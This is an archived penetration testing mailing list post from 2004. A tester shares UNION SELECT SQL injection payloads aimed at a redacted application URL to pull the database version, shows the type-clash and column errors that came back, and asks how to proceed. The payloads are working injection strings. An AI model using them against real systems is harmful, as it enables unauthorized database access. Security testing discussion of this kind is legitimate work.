Penetration Testing mailing list archives
SQL Injection & ncompatible with int issue
From: Peter Bair <peterbair100 () hotmail com>
Date: 9 Jun 2004 23:51:06 -0000
I am currently testing an application that reveals it tables. I know the exact columns to perform a union but when I try the following: xxx.xxx.xxx/item='+union select @@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1+-- RESULT: Operand type clash: text is incompatible with int So I will try the solution: xxx.xxx.xxx/item='+union select @@version,1,1,1,1,1,1,1,1,1,1,1,1,1,"text"+-- RESULT: Invalid column name 'text'. I know that "text" is in the correct position and I tried 'text'. Is this app safe or can I go further? Thanks for any help.
Current thread:
- SQL Injection & ncompatible with int issue Peter Bair (Jun 10)
- Re: SQL Injection & ncompatible with int issue Martin Eiszner (Jun 14)
- <Possible follow-ups>
- RE: SQL Injection & ncompatible with int issue Amichai Shulman (Jun 14)